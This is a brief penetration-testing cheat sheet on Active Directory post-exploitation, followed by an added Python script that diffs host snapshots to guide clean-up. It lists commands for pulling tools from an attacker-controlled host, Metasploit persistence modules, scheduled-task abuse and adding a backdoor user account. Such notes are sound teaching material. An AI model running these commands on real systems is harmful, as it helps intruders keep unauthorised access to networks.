Post Exploitation: Active Directory

Aditya Jha
Jul 20, 2023

File Transfer

Certutil

HTTP

  • python -m SimpleHTTPServer 80 (Python 2; on Python 3 use python3 -m http.server 80)

Browser

  • Navigate directly to file

FTP

  • python -m pyftpdlib -p 21 (attacker machine)
  • ftp 10.10.10.10 (Attacker IP)

Linux

  • wget

Maintaining Access

Persistence Scripts

  • run persistence -h
  • exploit/windows/local/persistence
  • exploit/windows/local/registry_persistence

Scheduled Tasks

  • run scheduleme
  • run schtaskabuse

Add a user

  • net user hacker password123 /add

Pivoting

Moving inside a network from one machine to another machine is known as Pivoting.

We can use Metasploit to attempt pivoting, for example with the auxiliary/scanner/portscan/tcp module.

Clean Up

Leave the system and network as they were when you entered them:

  • Remove executables, scripts, and added files.
  • Remove malware, rootkits, and added user accounts.
  • Set settings back to their original configurations.
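
One way to verify the clean-up list above is to snapshot the host at entry and again at exit, then diff the two. This is an added example, not code from the original post. The host name WS01 and the task, file and setting names are constructed, and the 25-character column layout of `net user` output is an assumption.

```python
# Added example: diff entry/exit host snapshots into a clean-up checklist.
import re

def parse_net_user(output):
    """Account names from `net user` output (assumes 25-character columns)."""
    names, in_table = set(), False
    for line in output.splitlines():
        if re.fullmatch(r"-{10,}", line.strip()):
            in_table = True                      # names start after the rule
        elif line.startswith("The command completed"):
            break
        elif in_table:                           # fixed width: names may contain spaces
            cols = (line[i:i + 25].strip() for i in range(0, len(line), 25))
            names.update(c for c in cols if c)
    return names

def cleanup_plan(before, after):
    """Sorted (action, category, item) tuples that restore `before`."""
    plan = []
    for cat in sorted(set(before) | set(after)):
        old, new = before.get(cat, {}), after.get(cat, {})
        plan += [("remove", cat, i) for i in set(new) - set(old)]
        plan += [("restore", cat, i) for i in set(old) - set(new)]
        if isinstance(old, dict) and isinstance(new, dict):
            plan += [("revert", cat, i) for i in set(old) & set(new)
                     if old[i] != new[i]]
    return sorted(plan)

# Constructed `net user` output for a hypothetical host WS01.
HEAD = "User accounts for \\\\WS01\n\n" + "-" * 79 + "\n"
FOOT = "The command completed successfully.\n"
ENTRY = HEAD + f"{'Administrator':<25}{'Guest':<25}{'svc backup':<25}\n" + FOOT
EXIT = (HEAD + f"{'Administrator':<25}{'Guest':<25}{'hacker':<25}\n"
        + f"{'svc backup':<25}\n" + FOOT)
BEFORE = {
    "users": parse_net_user(ENTRY),
    "scheduled_tasks": {r"\Microsoft\Windows\Defrag\ScheduledDefrag"},
    "files": {r"C:\Users\Public\notes.txt"},
    "settings": {"screen_lock_timeout": "600"},
}
AFTER = {
    "users": parse_net_user(EXIT),
    "scheduled_tasks": BEFORE["scheduled_tasks"] | {r"\Updater"},
    "files": {r"C:\Users\Public\tool.exe"},
    "settings": {"screen_lock_timeout": "0"},
}

if __name__ == "__main__":
    print(*cleanup_plan(BEFORE, AFTER), sep="\n")
```

An empty plan means the exit snapshot matches the entry snapshot; any remaining row is an artifact still to be removed, restored or reverted.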
